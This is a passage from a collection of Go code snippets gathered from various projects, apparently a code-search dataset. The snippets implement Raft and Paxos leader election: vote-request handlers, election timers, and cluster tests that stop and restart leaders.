args.LastLogTerm && lastLogIndex <= args.LastLogIndex)\n\n\t// Both checks should be true to grant vote\n\tif voteCheck && logCheck {\n\t\treply.VoteGranted = true\n\t\t_, _ = DPrintf(vote(\"[T%v] %v: Received RequestVote from %v | Vote Successful\"), rf.currentTerm, rf.me, args.CandidateID)\n\t\trf.currentTerm = args.Term\n\t\trf.votedFor = args.CandidateID\n\t} else if !voteCheck {\n\t\t_, _ = DPrintf(vote(\"[T%v] %v: Received RequestVote from %v | Vote Failure | Already voted for %v\"), rf.currentTerm, rf.me, args.CandidateID, rf.votedFor)\n\t} else {\n\t\t_, _ = DPrintf(vote(\"[T%v] %v: Received RequestVote from %v | Vote Failure | No Up-To-Date Log | Received {LastLogTerm: %v, LastLogIndex: %v} | Current {LastLogTerm: %v, LastLogIndex: %v}\"),\n\t\t\trf.currentTerm, rf.me, args.CandidateID, args.LastLogTerm, args.LastLogIndex, lastLogTerm, lastLogIndex)\n\t}\n\trf.resetTTL()\n}", "func (rf *Raft) sendRequestVote(server int, args *RequestVoteArgs, reply *RequestVoteReply) bool {\n ok := rf.peers[server].Call(\"Raft.RequestVote\", args, reply)\n return ok\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\treply.VoterId = rf.peerId\n\tif args.Term < rf.currentTerm {\n\t\treply.Term = rf.currentTerm\n\t\treply.VoteGranted = false\n\t\treturn\n\t}\n\tif args.Term > rf.currentTerm {\n\t\trf.stepDownToFollower(args.Term)\n\t}\n\tlastLog := rf.getLastLog()\n\tif (rf.votedFor == \"\" || rf.votedFor == args.CandidateId) && (lastLog.Term < args.LastLogTerm || (lastLog.Index <= args.LastLogIndex && lastLog.Term == args.LastLogTerm)) {\n\t\treply.Term = rf.currentTerm\n\t\trf.grantCh <- true\n\t\treply.VoteGranted = true\n\t\t// set voteFor\n\t\trf.votedFor = args.CandidateId\n\t\tlog.Printf(\"peer %v elect peer %v as leader\\n\", rf.peerId, args.CandidateId)\n\t}\n\treturn\n}", "func (fp *FastPaxos) LeaderVote(vote *Vote) (*common.Future, *common.Future) {\n\treturn fp.fpManager.LeaderVote(vote)\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\t//log.Println(\"Raft \", rf.me, \"term \", rf.currentTerm, \" receive vote request from Raft \", args.Me, \" term \", args.Term)\n\treply.Me = rf.me\n\n\tif args.Term == rf.currentTerm {\n\t\tif args.Me != rf.leader {\n\t\t\treply.Agree = false\n\t\t} else {\n\t\t\t// heartbeat, reset timer\n\t\t\treply.Agree = true\n\t\t\trf.resetElectionTimer()\n\t\t\t//log.Println(\"rf \", args.Me, \" -> rf \", rf.me)\n\t\t}\n\n\t} else if args.Term > rf.currentTerm {\n\t\t// vote request\n\t\t_, voted := rf.votedTerms[args.Term]\n\n\t\tif voted {\n\t\t\treply.Agree = false\n\n\t\t} else {\n\t\t\trf.stopElectionTimer()\n\n\t\t\t// new term start\n\t\t\tif rf.leader == rf.me {\n\t\t\t\trf.dethrone()\n\t\t\t}\n\n\t\t\treply.Agree = true\n\t\t\trf.leader = args.Me\n\t\t\trf.votedTerms[args.Term] = args.Me\n\t\t\trf.currentTerm = args.Term\n\t\t\trf.resetElectionTimer()\n\t\t\tlog.Println(\"Server \", rf.me, \" vote server \", args.Me, \" as leader in term \",\n\t\t\t\targs.Term)\n\t\t}\n\n\t} else {\n\t\treply.Agree = false\n\t}\n\t//log.Println(\"Raft \", rf.me, \" reply \", args.Me, \" reply: \", reply)\n}", "func TestLeaderFailure(t *testing.T){\r\n\tif !TESTLEADERFAILURE{\r\n\t\treturn\r\n\t}\r\n rafts,_ := makeRafts(5, \"input_spec.json\", \"log\", 200, 300)\t\r\n\ttime.Sleep(2*time.Second)\t\t\t\r\n\trunning := make(map[int]bool)\r\n\tfor i:=1;i<=5;i++{\r\n\t\trunning[i] = true\r\n\t}\r\n\trafts[0].smLock.RLock()\r\n\tlid := rafts[0].LeaderId()\r\n\trafts[0].smLock.RUnlock()\r\n\tdebugRaftTest(fmt.Sprintf(\"leader Id:%v\\n\", lid))\r\n\tif lid != -1{\r\n\t\trafts[lid-1].Shutdown()\r\n\t\tdebugRaftTest(fmt.Sprintf(\"Leader(id:%v) is down, now\\n\", lid))\r\n\t\ttime.Sleep(4*time.Second)\t\t\t\r\n\t\trunning[lid] = false\r\n\t\tfor i := 1; i<= 5;i++{\r\n\t\t\tif running[i] {\r\n\t\t\t\trafts[i-1].Append([]byte(\"first\"))\r\n\t\t\t\tbreak\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\ttime.Sleep(5*time.Second)\t\t\t\r\n\r\n\tfor idx, node := range rafts {\r\n\t\tnode.smLock.RLock()\r\n\t\tdebugRaftTest(fmt.Sprintf(\"%v\", node.sm.String()))\r\n\t\tnode.smLock.RUnlock()\r\n\t\tif running[idx-1]{\r\n\t\t\tnode.Shutdown()\r\n\t\t}\r\n\t}\r\n}", "func RTTest(t *testing.T) {\n\t//func main() {\n\t//Initialize nodes ; skip error tests\n\tnode, err := ros.NewNode(\"client\", os.Args)\n\tnode2, err := ros.NewNode(\"server\", os.Args)\n\t//Defer node shutdown\n\tdefer node.Shutdown()\n\tdefer node2.Shutdown()\n\n\t//Initialize Client\n\tcli := node.NewServiceClient(\"/add_two_ints\", rospy_tutorials.SrvAddTwoInts)\n\tif cli == nil {\n\t\tt.Error(\"Failed to initialize client\")\n\t}\n\tdefer cli.Shutdown()\n\n\t//Initialize server thread\n\tquitThread := make(chan bool)\n\tgo spinServer(node2, quitThread)\n\n\tfor node.OK() {\n\t\t//Create and call service request\n\t\tservice.Request.A = 10\n\t\tservice.Request.B = 10\n\t\tif err = cli.Call(&service); err != nil {\n\t\t}\n\n\t\t//When a response is recieved\n\t\tif service.Response.Sum != 0 {\n\t\t\t//Check if response is correct\n\t\t\tif service.Response.Sum == 20 {\n\t\t\t\tcli.Shutdown()\n\t\t\t\tdefer close(quitThread)\n\t\t\t\treturn\n\t\t\t}\n\t\t\t//Response incorrect\n\t\t\tcli.Shutdown()\n\t\t\tdefer close(quitThread)\n\t\t\tt.Error(\"Incorrect response recieved from server\")\n\t\t}\n\t\t//Spin client node\n\t\t_ = node.SpinOnce()\n\t}\n}", "func TestNodePropose(t *testing.T) {\n\tvar msgs []pb.Message\n\tappendStep := func(r *raft, m pb.Message) error {\n\t\tmsgs = append(msgs, m)\n\t\treturn nil\n\t}\n\n\tn := newTestNode(1, []uint64{2, 3}, 0)\n\tgo n.Start()\n\n\tr := n.raft\n\tr.campaign()\n\n\tfor {\n\t\trd := <-n.Ready()\n\t\tif len(rd.Messages) != 0 {\n\t\t\tfor _, msg := range rd.Messages {\n\t\t\t\tif msg.Type == pb.MessageType_MsgVote {\n\t\t\t\t\tt.Log(\"get vote request\")\n\t\t\t\t\t//go func() {\n\t\t\t\t\tn.Step(context.TODO(), pb.Message{From: 2, To: 1, Term: msg.Term, Type: pb.MessageType_MsgVoteResp})\n\t\t\t\t\t//}()\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\t// change the step function to appendStep until this raft becomes leader\n\t\tif r.leaderID == r.localID {\n\t\t\tr.step = appendStep\n\t\t\tn.Advance()\n\t\t\tbreak\n\t\t}\n\t\tn.Advance()\n\t}\n\tn.Propose(context.TODO(), []byte(\"somedata\"))\n\tn.Stop()\n\n\tif len(msgs) != 1 {\n\t\tt.Fatalf(\"len(msgs) = %d, want %d\", len(msgs), 1)\n\t}\n\tif msgs[0].Type != pb.MessageType_MsgProp {\n\t\tt.Errorf(\"msg type = %d, want %d\", msgs[0].Type, pb.MessageType_MsgProp)\n\t}\n\tif !bytes.Equal(msgs[0].Entries[0].Data, []byte(\"somedata\")) {\n\t\tt.Errorf(\"data = %v, want %v\", msgs[0].Entries[0].Data, []byte(\"somedata\"))\n\t}\n}", "func (le *LeaderElector) initElection() {\n\thighestRank := false\n\t//Poll servers with higher rank\n\tfor SID, serv := range le.ThisServer.GroupInfoPtr.GroupMembers {\n\t\tif SID < le.ThisServer.SID {\n\t\t\t//Has Higher rank, SID 0 > SID 1 > SID 2 ....\n\t\t\tok := call(serv, \"LeaderElector.ChangeLeader\", new(interface{}), &highestRank)\n\t\t\tif ok && highestRank == true {\n\t\t\t\t//Theres a server with higher rank, let go\n\t\t\t\tdebug(\"[*] Info : LeaderElector : There is Another Server - %s- With Higher Rank.Backing off. \", serv)\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}\n\t//No server with higher rank, become leader\n\tle.becomeLeader()\n}", "func (rf *Raft) tryToBeLeader() {\n\t//Step 1\n\tvar maxVoteNum, currentSuccessNum int\n\trf.mu.Lock()\n\trf.currentTerm++\n\trf.votedFor = rf.me\n\trf.role = Candidate\n\tmaxVoteNum = len(rf.peers)\n\trf.mu.Unlock()\n\trf.persist()\n\n\tcurrentSuccessNum = 1\n\tvar mutex sync.Mutex\n\tfor i := 0; i < maxVoteNum; i++ {\n\t\tif i != rf.me {\n\t\t\tgo func(idx int) {\n\t\t\t\tvar templateArgs RequestVoteArgs\n\t\t\t\trf.mu.Lock()\n\t\t\t\taLeaderComeUp := rf.role == Follower || rf.role == Leader\n\n\t\t\t\tif aLeaderComeUp {\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\ttemplateArgs.Term = rf.currentTerm\n\t\t\t\ttemplateArgs.CandidateID = rf.me\n\t\t\t\ttemplateArgs.LastLogTerm = rf.logs[len(rf.logs)-1].Term\n\t\t\t\ttemplateArgs.LastLogIndex = len(rf.logs) - 1\n\t\t\t\trf.mu.Unlock()\n\n\t\t\t\targs := templateArgs\n\t\t\t\tvar reply RequestVoteReply\n\t\t\t\tok := rf.sendRequestVote(idx, &args, &reply)\n\n\t\t\t\trf.mu.Lock()\n\t\t\t\taLeaderComeUp = rf.role == Follower || rf.role == Leader || rf.role == None\n\t\t\t\trf.mu.Unlock()\n\t\t\t\tif aLeaderComeUp {\n\t\t\t\t\treturn\n\t\t\t\t} else {\n\t\t\t\t\tif ok {\n\t\t\t\t\t\tmutex.Lock()\n\t\t\t\t\t\tcurrentSuccessNum++\n\t\t\t\t\t\tmutex.Unlock()\n\t\t\t\t\t\tif currentSuccessNum >= maxVoteNum/2+1 {\n\t\t\t\t\t\t\trf.mu.Lock()\n\t\t\t\t\t\t\trf.role = Leader\n\t\t\t\t\t\t\tfor i := 0; i < len(rf.peers); i++ {\n\t\t\t\t\t\t\t\trf.nextIndex[i] = len(rf.logs)\n\t\t\t\t\t\t\t\trf.matchIndex[i] = 0\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\t\t\tgo rf.logDuplicate()\n\t\t\t\t\t\t\trf.msgChan <- BecomeLeader\n\t\t\t\t\t\t\treturn\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}(i)\n\t\t}\n\t}\n\n}", "func TestRaft1(t *testing.T) {\n\n\t//Remove any state recovery files\n\tfor i := 0; i < 5; i++ {\n\t\tos.Remove(fmt.Sprintf(\"%s_S%d.state\", raft.FILENAME, i))\n\t}\n\n\tgo main() //Starts all servers\n\n\tvar leaderId1, leaderId2 int\n\tack := make(chan bool)\n\n\ttime.AfterFunc(1*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\tleaderId1 = raft.KillLeader() //Kill leader\n\t\tlog.Print(\"Killed leader:\", leaderId1)\n\t})\n\n\ttime.AfterFunc(2*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\tleaderId2 = raft.KillLeader() //Kill current leader again\n\t\tlog.Print(\"Killed leader:\", leaderId2)\n\t})\n\n\ttime.AfterFunc(3*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\traft.ResurrectServer(leaderId2) //Resurrect last killed as follower\n\t\tlog.Print(\"Resurrected previous leader:\", leaderId2)\n\t})\n\n\ttime.AfterFunc(4*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\traft.ResurrectServerAsLeader(leaderId1) //Ressurect first one as leader\n\t\tlog.Print(\"Resurrected previous leader:\", leaderId1)\n\t})\n\n\ttime.AfterFunc(5*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\tack <- true\n\t})\n\n\t<-ack\n}", "func (rf *Raft) RequestVote(args RequestVoteArgs, reply *RequestVoteReply) error {\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tif rf.state == Down {\n\t\treturn nil\n\t}\n\tlastLogIdx, lastLogTerm := rf.lastLogIdxAndTerm()\n\tlog.Printf(\"[%v] received RequestVote RPC: %+v [currentTerm=%d votedFor=%d lastLogIdx=%d lastLogTerm=%d]\",\n\t\trf.me, args, rf.currentTerm, rf.votedFor, lastLogIdx, lastLogTerm)\n\tif args.Term > rf.currentTerm {\n\t\t// Raft rfServer in past term, revert to follower (and reset its state)\n\t\tlog.Printf(\"[%v] RequestVoteArgs.Term=%d bigger than currentTerm=%d\",\n\t\t\trf.me, args.Term, rf.currentTerm)\n\t\trf.toFollower(args.Term)\n\t}\n\n\t// if hasn't voted or already voted for this candidate or\n\t// if the candidate has up-to-date log (section 5.4.1 from paper) ...\n\tif rf.currentTerm == args.Term &&\n\t\t(rf.votedFor == -1 || rf.votedFor == args.Candidate) &&\n\t\t(args.LastLogTerm > lastLogTerm ||\n\t\t\t(args.LastLogTerm == lastLogTerm && args.LastLogIndex >= lastLogIdx)) {\n\t\t// ... grant vote\n\t\treply.VoteGranted = true\n\t\trf.votedFor = args.Candidate\n\t\trf.resetElection = time.Now()\n\t} else {\n\t\treply.VoteGranted = false\n\t}\n\treply.Term = rf.currentTerm\n\trf.persist()\n\tlog.Printf(\"[%v] replying to RequestVote: %+v\", rf.me, reply)\n\treturn nil\n}", "func (rf *Raft) convertToCandidate() {\n rf.mu.Lock()\n DLCPrintf(\"Server (%d)[state=%s, term=%d, votedFor=%d] convert to Candidate\", rf.me, rf.state, rf.currentTerm, rf.votedFor) \n rf.state = \"Candidate\"\n rf.currentTerm++\n rf.votedFor = rf.me\n rf.electionTime = generateElectionTime()\n rf.electionTimer.Reset(time.Duration(rf.electionTime) * time.Millisecond)\n rf.persist()\n DLCPrintf(\"Server (%d)[state=%s, term=%d, votedFor=%d, electionTime=%d] start request votes\", rf.me, rf.state, rf.currentTerm, rf.votedFor, rf.electionTime) \n rf.mu.Unlock()\n\n // 启动一个线程, requestVote\n go rf.requestForVotes()\n\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\tif rf.currentTerm < args.Term {\n\t\trf.debug(\"Updating term to new term %v\\n\", args.Term)\n\t\trf.currentTerm = args.Term\n\t\tatomic.StoreInt32(&rf.state, FOLLOWER)\n\t\trf.votedFor = LEADER_UNKNOWN\n\t}\n\n\treply.Term = rf.currentTerm\n\treply.VoteGranted = false\n\n\t// late candidates\n\tif args.Term < rf.currentTerm {\n\t\trf.debug(\"Rejecting candidate %v. Reason: late term=%v\\n\", args.CandidateId, args.Term)\n\t\treturn\n\t}\n\n\t// avoid double vote\n\tif rf.votedFor != LEADER_UNKNOWN && rf.votedFor != args.CandidateId {\n\t\trf.debug(\"Rejecting candidate %v. Reason: already voted\\n\", args.CandidateId)\n\t\treturn\n\t}\n\n\tlastLogIndex := rf.lastEntryIndex()\n\n\t// reject old logs\n\tif rf.index(lastLogIndex).Term > args.LastLogTerm {\n\t\trf.debug(\"Rejecting candidate %v. Reason: old log\\n\", args.CandidateId)\n\t\treturn\n\t}\n\n\t// log is smaller\n\tif rf.index(lastLogIndex).Term == args.LastLogTerm && args.LastLogIndex < lastLogIndex {\n\t\trf.debug(\"Rejecting candidate %v. Reason: small log\\n\", args.CandidateId)\n\t\treturn\n\t}\n\n\trf.votedFor = args.CandidateId\n\trf.gotContacted = true\n\n\trf.debug(\"Granting vote to %v. me=(%v,%v), candidate=(%v,%v)\\n\", args.CandidateId, lastLogIndex, rf.index(lastLogIndex).Term, args.LastLogIndex, args.LastLogTerm)\n\treply.VoteGranted = true\n\n\t// save state\n\trf.persist(false)\n}", "func testNonleadersElectionTimeoutNonconflict(t *testing.T, state StateType) {\n\tet := 10\n\tsize := 5\n\trs := make([]*raft, size)\n\tids := idsBySize(size)\n\tfor k := range rs {\n\t\trs[k] = newTestRaft(ids[k], ids, et, 1, NewMemoryStorage())\n\t}\n\tdefer func() {\n\t\tfor k := range rs {\n\t\t\tcloseAndFreeRaft(rs[k])\n\t\t}\n\t}()\n\tconflicts := 0\n\tfor round := 0; round < 1000; round++ {\n\t\tfor _, r := range rs {\n\t\t\tswitch state {\n\t\t\tcase StateFollower:\n\t\t\t\tr.becomeFollower(r.Term+1, None)\n\t\t\tcase StateCandidate:\n\t\t\t\tr.becomeCandidate()\n\t\t\t}\n\t\t}\n\n\t\ttimeoutNum := 0\n\t\tfor timeoutNum == 0 {\n\t\t\tfor _, r := range rs {\n\t\t\t\tr.tick()\n\t\t\t\tif len(r.readMessages()) > 0 {\n\t\t\t\t\ttimeoutNum++\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\t// several rafts time out at the same tick\n\t\tif timeoutNum > 1 {\n\t\t\tconflicts++\n\t\t}\n\t}\n\n\tif g := float64(conflicts) / 1000; g > 0.3 {\n\t\tt.Errorf(\"probability of conflicts = %v, want <= 0.3\", g)\n\t}\n}", "func (le *LeaderElector) PollLeader() {\n\t//Ping leader repeatdly every 15sec, if hasnt responded for 2 consequent pings, init LeaderChange\n\t//The frequency can be changed in paxos.config.json file.\n\tif le.LeaderSID != NO_LEADER && le.LeaderSID != le.ThisServer.SID {\n\t\talive := false\n\t\tstillLeader := false\n\t\tfor i := 0; i < 2; i++ {\n\t\t\tok := call(le.CurrentLeader, \"LeaderElector.Alive\", new(interface{}), &stillLeader)\n\t\t\tif ok && stillLeader {\n\t\t\t\talive = true\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tif !alive {\n\t\t\tdebug(\"[*] Info : LeaderElector : Leader with SID : %d && address : %s Suspected To have Failed. Starting Leader Election.\",\n\t\t\t\tle.LeaderSID, le.CurrentLeader)\n\t\t\tle.initElection()\n\t\t}\n\t} else if le.LeaderSID == NO_LEADER && !le.adjustingLead {\n\t\tle.initElection()\n\t}\n\t//Wait for 15 or specified secs\n\t<-time.After(le.PollLeaderFreq * time.Second)\n\tle.PollLeader()\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\treply.Term = rf.currentTerm\n\treply.VoteGranted = false\n\tDPrintf(\"before voted reply is %v, me id is %d, votedFor is %d, candidateId is %d, current term is %v, \" +\n\t\t\"args term is %v args log is %v log is %v\", reply, rf.me, rf.votedFor, args.CandidateId,\n\t\trf.currentTerm, args.LastLogTerm, args.LastLogIndex, rf.addLastIncludedIndex(len(rf.log)-1))\n\n\tif rf.currentTerm < args.Term {\n\t\trf.votedFor = -1\n\t\trf.currentTerm = args.Term\n\t\trf.raftState = Follower\n\t\trf.resetTimer()\n\t}\n\tif rf.votedFor == args.CandidateId || rf.votedFor == -1 {\n\t\tlastIndex := len(rf.log) - 1\n\t\tlastLogTerm := rf.log[lastIndex].Term\n\t\tif (args.LastLogTerm > lastLogTerm) ||\n\t\t\t(args.LastLogTerm == lastLogTerm && args.LastLogIndex >= rf.addLastIncludedIndex(lastIndex)) {\n\t\t\trf.votedFor = args.CandidateId\n\t\t\trf.raftState = Follower\n\t\t\treply.VoteGranted = true\n\t\t\trf.resetTimer()\n\t\t}\n\t}\n\trf.persist()\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\n\t//fmt.Printf(\"Server %d: log is %v\\n\", rf.me, rf.log)\n\n\tvar newer bool\n\n\tif args.Term > rf.currentTerm {\n\t\trf.votedFor = -1\n\t}\n\n\tif len(rf.log) == 0 || args.LastLogTerm > rf.log[len(rf.log)-1].Term {\n\t\tnewer = true\n\t} else if args.LastLogTerm == rf.log[len(rf.log)-1].Term && len(rf.log) <= args.LastLogIndex+1 {\n\t\tnewer = true\n\t}\n\n\tif newer == true && (rf.votedFor == -1 || rf.votedFor == args.CandidateID) {\n\t\treply.VoteGranted = true\n\t} else {\n\t\treply.VoteGranted = false\n\t}\n\n\tvar votedFor int\n\tif reply.VoteGranted {\n\t\tvotedFor = args.CandidateID\n\t} else {\n\t\tvotedFor = -1\n\t}\n\trf.votedFor = votedFor\n\n\tif args.Term < rf.currentTerm {\n\t\treply.VoteGranted = false\n\t} else if args.Term > rf.currentTerm {\n\t\trf.currentTerm = args.Term\n\t\tif rf.state != Follower {\n\t\t\trf.convertToFollower(rf.currentTerm, votedFor)\n\t\t}\n\t}\n\n\treply.Term = rf.currentTerm\n\n\trf.persist()\n\n\tif reply.VoteGranted == true {\n\t\tgo func() {\n\t\t\tselect {\n\t\t\tcase <-rf.grantVoteCh:\n\t\t\tdefault:\n\t\t\t}\n\t\t\trf.grantVoteCh <- true\n\t\t}()\n\t}\n}", "func (rf *Raft) sendRequestVote(server int, args *RequestVoteArgs, reply *RequestVoteReply) bool {\n ok := rf.peers[server].Call(\"Raft.RequestVote\", args, reply)\n return ok\n}", "func TestRemoveLeader(t *testing.T) {\n\tdefer leaktest.AfterTest(t)\n\tstopper := stop.NewStopper()\n\tconst clusterSize = 6\n\tconst groupSize = 3\n\tcluster := newTestCluster(nil, clusterSize, stopper, t)\n\tdefer stopper.Stop()\n\n\t// Consume and apply the membership change events.\n\tfor i := 0; i < clusterSize; i++ {\n\t\tgo func(i int) {\n\t\t\tfor {\n\t\t\t\tif e, ok := <-cluster.events[i].MembershipChangeCommitted; ok {\n\t\t\t\t\te.Callback(nil)\n\t\t\t\t} else {\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t}(i)\n\t}\n\n\t// Tick all the clocks in the background to ensure that all the\n\t// necessary elections are triggered.\n\t// TODO(bdarnell): newTestCluster should have an option to use a\n\t// real clock instead of a manual one.\n\tstopper.RunWorker(func() {\n\t\tticker := time.NewTicker(10 * time.Millisecond)\n\t\tdefer ticker.Stop()\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase <-stopper.ShouldStop():\n\t\t\t\treturn\n\t\t\tcase <-ticker.C:\n\t\t\t\tfor _, t := range cluster.tickers {\n\t\t\t\t\tt.NonBlockingTick()\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t})\n\n\t// Create a group with three members.\n\tgroupID := roachpb.RangeID(1)\n\tcluster.createGroup(groupID, 0, groupSize)\n\n\t// Move the group one node at a time from the first three nodes to\n\t// the last three. In the process, we necessarily remove the leader\n\t// and trigger at least one new election among the new nodes.\n\tfor i := 0; i < groupSize; i++ {\n\t\tlog.Infof(\"adding node %d\", i+groupSize)\n\t\tch := cluster.nodes[i].ChangeGroupMembership(groupID, makeCommandID(),\n\t\t\traftpb.ConfChangeAddNode,\n\t\t\troachpb.ReplicaDescriptor{\n\t\t\t\tNodeID: cluster.nodes[i+groupSize].nodeID,\n\t\t\t\tStoreID: roachpb.StoreID(cluster.nodes[i+groupSize].nodeID),\n\t\t\t\tReplicaID: roachpb.ReplicaID(cluster.nodes[i+groupSize].nodeID),\n\t\t\t}, nil)\n\t\tif err := <-ch; err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\n\t\tlog.Infof(\"removing node %d\", i)\n\t\tch = cluster.nodes[i].ChangeGroupMembership(groupID, makeCommandID(),\n\t\t\traftpb.ConfChangeRemoveNode,\n\t\t\troachpb.ReplicaDescriptor{\n\t\t\t\tNodeID: cluster.nodes[i].nodeID,\n\t\t\t\tStoreID: roachpb.StoreID(cluster.nodes[i].nodeID),\n\t\t\t\tReplicaID: roachpb.ReplicaID(cluster.nodes[i].nodeID),\n\t\t\t}, nil)\n\t\tif err := <-ch; err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\t}\n}", "func TestKillLeader(t *testing.T) {\n\tprocAttr := new(os.ProcAttr)\n\tprocAttr.Files = []*os.File{nil, os.Stdout, os.Stderr}\n\n\tclusterSize := 5\n\targGroup, etcds, err := createCluster(clusterSize, procAttr, false)\n\n\tif err != nil {\n\t\tt.Fatal(\"cannot create cluster\")\n\t}\n\n\tdefer destroyCluster(etcds)\n\n\tleaderChan := make(chan string, 1)\n\n\ttime.Sleep(time.Second)\n\n\tgo leaderMonitor(clusterSize, 1, leaderChan)\n\n\tvar totalTime time.Duration\n\n\tleader := \"http://127.0.0.1:7001\"\n\n\tfor i := 0; i < clusterSize; i++ {\n\t\tfmt.Println(\"leader is \", leader)\n\t\tport, _ := strconv.Atoi(strings.Split(leader, \":\")[2])\n\t\tnum := port - 7001\n\t\tfmt.Println(\"kill server \", num)\n\t\tetcds[num].Kill()\n\t\tetcds[num].Release()\n\n\t\tstart := time.Now()\n\t\tfor {\n\t\t\tnewLeader := <-leaderChan\n\t\t\tif newLeader != leader {\n\t\t\t\tleader = newLeader\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\ttake := time.Now().Sub(start)\n\n\t\ttotalTime += take\n\t\tavgTime := totalTime / (time.Duration)(i+1)\n\n\t\tfmt.Println(\"Leader election time is \", take, \"with election timeout\", ElectionTimeout)\n\t\tfmt.Println(\"Leader election time average is\", avgTime, \"with election timeout\", ElectionTimeout)\n\t\tetcds[num], err = os.StartProcess(\"etcd\", argGroup[num], procAttr)\n\t}\n}", "func (rf *Raft) sendRequestVote(server int, args *RequestVoteArgs, reply *RequestVoteReply) bool {\n\tDPrintf(\"[%v to %v]: RequestVote REQ: args: %+v\", rf.me, server, args)\n\n\tok := rf.peers[server].Call(\"Raft.RequestVote\", args, reply)\n\n\tDPrintf(\"[%v to %v]: RequestVote ACK. result: %v, reply: %+v\", rf.me, server, ok, reply)\n\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\tif ok {\n\t\tterm := rf.currentTerm\n\t\tif rf.state != CANDIDATE {\n\t\t\treturn ok\n\t\t}\n\n\t\tif args.Term != term {\n\t\t\treturn ok\n\t\t}\n\n\t\tif reply.Term > term {\n\t\t\trf.currentTerm = reply.Term\n\t\t\trf.state = FOLLOWER\n\t\t\trf.votedFor = -1\n\t\t\trf.persist()\n\t\t}\n\n\t\tif reply.VoteGranted {\n\t\t\trf.voteCounter++\n\t\t\tif rf.voteCounter > len(rf.peers) / 2 && rf.state == CANDIDATE {\n\t\t\t\t//\n\t\t\t\trf.state = FOLLOWER\n\t\t\t\trf.leaderChan <- true\n\t\t\t}\n\t\t}\n\n\t\t//rf.mu.Unlock()\n\t}\n\n\n\n\treturn ok\n}", "func TestRaftNewLeader(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tclusterPrefix := \"TestRaftNewLeader\"\n\n\t// Create n1 node.\n\tstorage := NewStorage(NewMemSnapshotMgr(), NewMemLog(), NewMemState(0))\n\tfsm1 := newTestFSM(ID1)\n\t// NOTE we use different cluster ID for nodes within same cluster to avoid\n\t// registering same metric path twice. This should never happen in real world\n\t// because we'll never run nodes of a same cluster within one process.\n\tn1 := testCreateRaftNode(getTestConfig(ID1, clusterPrefix+ID1), storage)\n\t// Create n2 node.\n\tstorage = NewStorage(NewMemSnapshotMgr(), NewMemLog(), NewMemState(0))\n\tfsm2 := newTestFSM(ID2)\n\tn2 := testCreateRaftNode(getTestConfig(ID2, clusterPrefix+ID2), storage)\n\tconnectAllNodes(n1, n2)\n\tn1.Start(fsm1)\n\tn2.Start(fsm2)\n\tn2.ProposeInitialMembership([]string{ID1, ID2})\n\n\t// Wait until a leader is elected.\n\tselect {\n\tcase <-fsm1.leaderCh:\n\tcase <-fsm2.leaderCh:\n\t}\n}", "func (r *Raft) sendVoteRequestRpc(value ServerConfig, VoteCount chan int) error {\n\n\tclient, err := rpc.Dial(\"tcp\", \"localhost:\"+strconv.Itoa(value.LogPort))\n\tlog.Println(\"Dialing vote request rpc from:\",r.Id,\" to:\",value.Id)\n\n\t if err != nil {\n\t\tlog.Print(\"Error Dialing sendVoteRequestRpc:\", err)\n\t\tVoteCount<-0\n\t\treturn err\n\t }\n\n\t logLen:= len(r.Log)\n\t var lastLogIndex int\n\t var lastLogTerm int\n\n\t if logLen >0 { // if log is not empty, send index and term of last log\n\t \tlastLogIndex=logLen-1\t \t\n\t \tlastLogTerm = r.Log[lastLogIndex].Term\n\t } else { // if log is empty, send index and term as 0\n\t \tlastLogIndex=0\n\t \tlastLogTerm=0\n\t }\n\n\t // Prepare argumenst to be sent to follower\n\t args:= RequestVoteRPCArgs{r.CurrentTerm,r.Id,lastLogTerm,lastLogIndex,}\n\n\tvar reply bool // reply variable will reciece the vote from other server, true is voted, false otherwise\n\tdefer client.Close()\n\terr1 := client.Call(\"RPC.VoteForLeader\", &args, &reply) \n\n\tif err1 != nil {\n\t\tlog.Print(\"Remote Method Invocation Error:Vote Request:\", err1)\n\t}\n\tif(reply) { // if reply is positive infrom the candiate \n\t\t//fmt.Println(\"Received reply of vote request from:\",value.Id,\" for:\",r.Id)\n\t\tVoteCount <-1\t\n\t}else{\n\t\tVoteCount <-0 // if reply is negative infrom the candiate \n\t\t//fmt.Println(\"Received Negative reply of vote request from:\",value.Id,\" for:\",r.Id)\n\t}\n\treturn nil\n}", "func (rf *Raft) RequestVote(args 